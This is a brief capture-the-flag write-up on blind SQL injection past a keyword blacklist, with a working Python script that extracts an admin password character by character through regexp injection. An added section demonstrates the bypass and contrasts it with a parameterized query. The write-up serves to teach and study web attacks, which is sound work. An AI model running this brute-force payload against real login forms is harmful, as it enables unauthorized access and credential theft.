SQLi

robots.txt reveals that hint.txt exists and contains a hint...

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

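This was too convoluted, so I went straight to a writeup: use \ to escape the ', so that passwd becomes part of the query statement; regexp injection; %00 as the line-break comment.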

import string
import requests
import time
from urllib import parse

url = 'http://b5774215-3cf9-41cb-b58d-afca88641fdd.node4.buuoj.cn:81/'
result = ''
# 26 letters + digits + a few symbols; be careful with wildcard characters
s = string.ascii_lowercase + string.digits + '_{}'
last = 'tmp'
while(result != last):
    last = result
    for i in s:
        payload = "||(passwd)regexp(\"^{}\");{}".format(
            (result+i), parse.unquote('%00'))
        data = {
            "username": "\\",
            "passwd": payload
        }
        res = requests.post(url, data=data)
        if res.status_code == 503:
            print('Too fast')
            break
        if b'welcome' in res.content:
            result += i
            print(result)
            break
        time.sleep(0.05)
print('[*]'+result)

https://syunaht.com/p/2489403193.html
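
Added example, not part of the original write-up or the challenge source: it runs the hint.txt blacklist over the two inputs used in the script above, shows how a MySQL-style lexer splits the concatenated query once the backslash swallows the closing quote, and contrasts that with a parameterized lookup. The query shape in `TEMPLATE`, the `accounts` table and its one row are assumptions constructed for the demonstration, since the page never shows the server-side SQL.

```python
import re
import sqlite3

# Blacklist from hint.txt as quoted on this page, ported to a Python regex.
BLACK_LIST = re.compile(
    r"limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select"
    r"|greatest|%00|'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table"
    r"|concat|insert|join|having|sleep", re.I)

# Assumption: the page never shows the server-side SQL; this shape is hypothetical.
TEMPLATE = "select * from accounts where username='{}' and passwd='{}'"

def is_blocked(value):
    """True when the blacklist would reject the input."""
    return BLACK_LIST.search(value) is not None

def string_literals(sql):
    """Return the string literals a MySQL-style lexer sees (backslash escapes
    enabled), stopping at the first unquoted ';'."""
    literals, i = [], 0
    while i < len(sql):
        ch = sql[i]
        if ch == ";":
            break
        if ch in "'\"":
            j = i + 1
            while j < len(sql) and sql[j] != ch:
                j += 2 if sql[j] == "\\" else 1   # a backslash escapes the next char
            literals.append(sql[i + 1:j])
            i = j
        i += 1
    return literals

def safe_login(conn, username, passwd):
    """Parameterized lookup: inputs are bound as data and never parsed as SQL."""
    cur = conn.execute(
        "select 1 from accounts where username=? and passwd=?", (username, passwd))
    return cur.fetchone() is not None

def demo():
    user, pw = "\\", '||(passwd)regexp("^a");\x00'   # inputs taken from the page's script
    conn = sqlite3.connect(":memory:")
    conn.execute("create table accounts (username text, passwd text)")
    conn.execute("insert into accounts values ('admin', 'constructed-secret')")
    return (is_blocked(user), is_blocked(pw),
            string_literals(TEMPLATE.format(user, pw)), safe_login(conn, user, pw))

if __name__ == "__main__":
    print(demo())
```

Neither input trips the blacklist, and the first literal the lexer sees is `\' and passwd=`, so the `passwd` field is parsed as SQL rather than data; with bound parameters the same inputs are compared as plain strings and match nothing.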
